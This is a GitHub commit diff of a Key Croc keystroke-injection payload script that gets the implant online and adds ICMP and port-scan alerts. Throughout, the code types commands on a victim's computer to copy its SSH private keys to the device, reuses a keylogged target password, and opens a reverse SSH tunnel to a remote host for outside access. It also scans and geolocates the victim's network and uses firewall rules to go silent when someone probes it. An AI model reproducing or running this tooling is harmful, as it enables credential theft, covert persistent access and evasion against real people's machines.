Update Croc_getonline.txt

minor changes
added  ICMP and Port Alerts
pull/62/head
spywill 2023-07-22 08:46:14 -04:00 committed by GitHub
parent 55053ddffb
commit 19f2907265
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 89 additions and 29 deletions

View File

@ -2,7 +2,7 @@
# Description: Attempt to connect Keycroc automatically to target wifi access point # Description: Attempt to connect Keycroc automatically to target wifi access point
# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
# Author: spywill # Author: spywill
# Version: 4.1 # Version: 4.2
# Category: Key Croc # Category: Key Croc
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
@ -17,6 +17,7 @@
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL # getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET # getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot # getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
# getonline_T <-- MATCH word for Stopping ICMP/PORT alert
MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X) MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
QUACK LOCK QUACK LOCK
@ -40,11 +41,14 @@ known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
recon=off recon=off
recon_loot=/root/udisk/tools/Target_SSID.txt recon_loot=/root/udisk/tools/Target_SSID.txt
#---> Edit Linux target password below alert=off
alert_time=60
#---> Edit target password below
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
else else
target_password=ENTER_LINUX_PASSWORD_HERE target_password=ENTER_TARGET_PASSWORD_HERE
fi fi
recon_scan() { recon_scan() {
@ -53,10 +57,16 @@ recon_scan() {
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
QUACK ENTER QUACK ENTER
QUACK DELAY 2000 QUACK DELAY 2000
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY.txt\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
QUACK ENTER
QUACK DELAY 2000
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
QUACK ENTER QUACK ENTER
QUACK DELAY 2000 QUACK DELAY 2000
QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY.txt\" || :"
QUACK ENTER
QUACK DELAY 2000
else else
: :
fi fi
@ -103,6 +113,14 @@ CLEAN_UP() {
fi fi
} }
calculate_network_range() {
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
}
case $LOOT in case $LOOT in
getonline_W) getonline_W)
ENTER_STORAGE ENTER_STORAGE
@ -220,6 +238,22 @@ case $LOOT in
rm -f $recon_loot root/udisk/config.txt rm -f $recon_loot root/udisk/config.txt
apt -y remove sshpass apt -y remove sshpass
reboot --force reboot --force
RESET_PAYLOAD
;;
getonline_T)
if ps -p "$(sed -n 1p /tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then
kill -9 "$(sed -n 1p /tmp/port_pid.txt)"
fi
if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)"
fi
killall -9 tcpdump
sleep 1
else
:
fi
RESET_PAYLOAD
;; ;;
esac esac
sleep 3 sleep 3
@ -292,18 +326,13 @@ if : >/dev/tcp/8.8.8.8/53; then
QUACK ENTER QUACK ENTER
elif [ $option -eq 2 ]; then elif [ $option -eq 2 ]; then
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
if [ ! $? = 0 ] || [ ! "$status" = installed ]; then [ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass
apt -y install sshpass
else
:
fi
sleep 1 sleep 1
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null [ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
rm -rf ~/.ssh 2>/dev/null
ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
sleep 1 sleep 1
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
sleep 3
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
else else
LED R LED R
@ -324,10 +353,6 @@ else
LED R LED R
fi fi
sleep 3
LED OFF
QUACK UNLOCK
if [ "$recon" = "on" ]; then if [ "$recon" = "on" ]; then
LED C SLOW LED C SLOW
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
@ -337,28 +362,63 @@ if [ "$recon" = "on" ]; then
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
cat /etc/resolv.conf | grep nameserver >> $recon_loot cat /etc/resolv.conf | grep nameserver >> $recon_loot
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
calculate_network_range() {
ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
echo "$network_range"
}
perform_nmap_scan() { perform_nmap_scan() {
local network_range=$1 echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
nmap -T4 -F $network_range >> $recon_loot nmap -T4 -F $network_range >> $recon_loot
} }
network_range=$(calculate_network_range) calculate_network_range
perform_nmap_scan $network_range perform_nmap_scan
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
echo -ne "\n\n" >> $recon_loot echo -ne "\n\n" >> $recon_loot
LED OFF
elif [ "$recon" = "off" ]; then elif [ "$recon" = "off" ]; then
: :
else else
: :
fi fi
if [ "$alert" = "on" ]; then
icmp_alert() {
calculate_network_range
sleep 1
until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address'' | grep -o "IP.*" | sed 's/id.*//g; s/length.*//g' | sed 's/IP/\n&/g'); do
:
done
LED R SLOW
iptables -F
iptables -A OUTPUT -p icmp --icmp-type any -j DROP
sleep $alert_time
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
LED B ; sleep 2 ; LED OFF
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
}
port_alert() {
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
file=/tmp/tcpdump.out
until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do
:
done
LED R SLOW
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
sleep $alert_time
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
LED B ; sleep 2 ; LED OFF
port_alert & echo -ne $! > /tmp/port_pid.txt
}
iptables-save > /root/udisk/tools/firewall-rules-backup.txt
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
port_alert & echo -ne $! > /tmp/port_pid.txt
LED B
elif [ "$alert" = "off" ]; then
:
else
:
fi
sleep 3
LED OFF
QUACK UNLOCK